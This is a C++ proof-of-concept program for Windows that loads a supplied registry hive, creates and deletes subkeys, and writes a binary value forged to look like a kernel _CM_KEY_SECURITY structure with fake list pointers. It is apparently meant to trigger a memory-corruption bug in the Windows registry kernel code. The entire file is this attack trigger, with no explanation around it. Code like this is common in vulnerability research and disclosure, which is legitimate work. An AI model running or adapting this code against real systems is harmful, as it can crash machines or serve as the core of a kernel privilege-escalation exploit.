#include <Windows.h>

#include <cstdio>

int main(int argc, char** argv) {
  if (argc != 2) {
    printf("Usage: %s <hive file>\n", argv[0]);
    return 1;
  }

  LONG st = ERROR_SUCCESS;
  HKEY hkey, hnewkeys[2];

  CONST INT kValueSize = 0x10;
  BYTE data[kValueSize] = { /* zero */ };

  *(DWORD*)&data[0x4] = 0x200000; // _CM_KEY_SECURITY.Flink
  *(DWORD*)&data[0x8] = 0x200000; // _CM_KEY_SECURITY.Blink
  *(DWORD*)&data[0xC] = 1;        // _CM_KEY_SECURITY.ReferenceCount

  do {
    st = RegLoadAppKeyA(argv[1], &hkey, KEY_ALL_ACCESS, 0, 0);
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Hive successfully loaded\n");

    st = RegCreateKeyExA(hkey, "NewSubKey1", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hnewkeys[0], NULL);
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Key #1 successfully created\n");

    st = RegCreateKeyExA(hkey, "NewSubKey2", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hnewkeys[1], NULL);
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Key #2 successfully created\n");

    st = RegDeleteKeyA(hkey, "NewSubKey2");
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Key #2 successfully deleted\n");

    st = RegSetValueExA(hkey, "Value", 0, REG_BINARY, data, kValueSize);
    if (st != ERROR_SUCCESS) {
      break;
    }

    st = RegDeleteKeyA(hkey, "NewSubKey1");
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Key #1 successfully deleted\n");

    st = RegCloseKey(hkey);
    if (st != ERROR_SUCCESS) {
      break;
    }
  } while (0);

  if (st != ERROR_SUCCESS) {
    printf("Call failed with error %d\n", st);
  }

  return 0;
}
